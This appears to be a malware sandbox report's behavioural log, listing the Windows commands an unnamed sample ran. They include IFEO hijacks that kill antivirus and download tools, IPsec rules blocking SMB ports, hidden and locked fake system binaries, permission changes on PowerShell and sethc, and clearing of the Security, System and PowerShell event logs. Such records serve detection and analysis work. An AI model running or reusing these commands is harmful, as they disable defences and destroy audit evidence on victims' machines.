Behavioral Analysis

attrib.exe attrib -s -h -r -a C:\Windows\Fonts

net1.exe C:\Windows\system32\net1 user mm123$ /del

net1.exe C:\Windows\system32\net1 stop mssecsvc2.0

net1.exe C:\Windows\system32\net1 stop mssecsvc2.1

reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f

PING.EXE ping 127.1 -n 5

sc.exe sc start MetPipAtcivator

sc.exe sc start MetPipAtcivator

net.exe net share iPC$ /delete

net.exe net share admin$ /delete

net.exe net share c$ /delete

net.exe net share d$ /delete

net.exe net share e$ /delete

net.exe net share f$ /delete

net.exe net stop lanmanserver /y

sc.exe sc config lanmanserver start= DISABLED

sc.exe sc start PolicyAgent

sc.exe sc config PolicyAgent start= AUTO

sc.exe sc stop Graphipcs_PerfSvcs

sc.exe sc delete Graphipcs_PerfSvcs

WMIC.exe wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate

attrib.exe attrib +s +h +r C:\Windows\svchost.exe

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\svchost.exe /d everyone

sc.exe sc stop conhost

sc.exe sc delete conhost

WMIC.exe wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate

takeown.exe takeown /f C:\Windows\SysWOW64\conhost.exe /a

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\conhost.exe /d everyone

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f

reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f

sc.exe sc start PolicyAgent

sc.exe sc config PolicyAgent start= AUTO

netsh.exe netsh ipsec static del all

netsh.exe netsh ipsec static add policy name=Aliyun

netsh.exe netsh ipsec static add filterlist name=Allowlist

netsh.exe netsh ipsec static add filterlist name=denylist

netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135

netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137

netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138

netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139

netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445

netsh.exe netsh ipsec static add filteraction name=Allow action=permit

netsh.exe netsh ipsec static add filteraction name=deny action=block

netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny

netsh.exe netsh ipsec static set policy name=Aliyun assign=y

taskkill.exe taskkill /f /t /im lsars.exe /im lsacs.exe

taskkill.exe taskkill /f /t /im sqlservr.exe

WMIC.exe wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate

attrib.exe attrib +s +h +r C:\Windows\Fonts\sqlservr.exe

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\Fonts\sqlservr.exe /d everyone

attrib.exe attrib +s +h +r C:\Windows\Fonts\csrss.exe

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\Fonts\csrss.exe /d everyone

WMIC.exe wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate

attrib.exe attrib +s +h +r C:\Windows\lsass.exe

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\lsass.exe /d everyone

sc.exe sc stop "Application Layre Gateway Saervice"

sc.exe sc delete "Application Layre Gateway Saervice"

taskkill.exe taskkill /f /t /im boy.exe

attrib.exe attrib +s +h +r C:\Windows\boy.exe

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\boy.exe /d everyone

taskkill.exe taskkill /f /t /im powershell.exe

takeown.exe takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system

takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system

takeown.exe takeown /f C:\Windows\system32\sethc.exe /a

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\system32\sethc.exe /g Administrators:f

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Users:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\system32\sethc.exe /e /g Administrators:r

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\system32\sethc.exe /e /d SERVICE

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"

cacls.exe cacls C:\Windows\system32\sethc.exe /e /d "network service"

cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"

cacls.exe cacls C:\Windows\system32\sethc.exe /e /g system:r

taskkill.exe taskkill /f /t /im wscript.exe

wevtutil.exe wevtutil cl "windows powershell"

wevtutil.exe wevtutil cl "security"

wevtutil.exe wevtutil cl "system"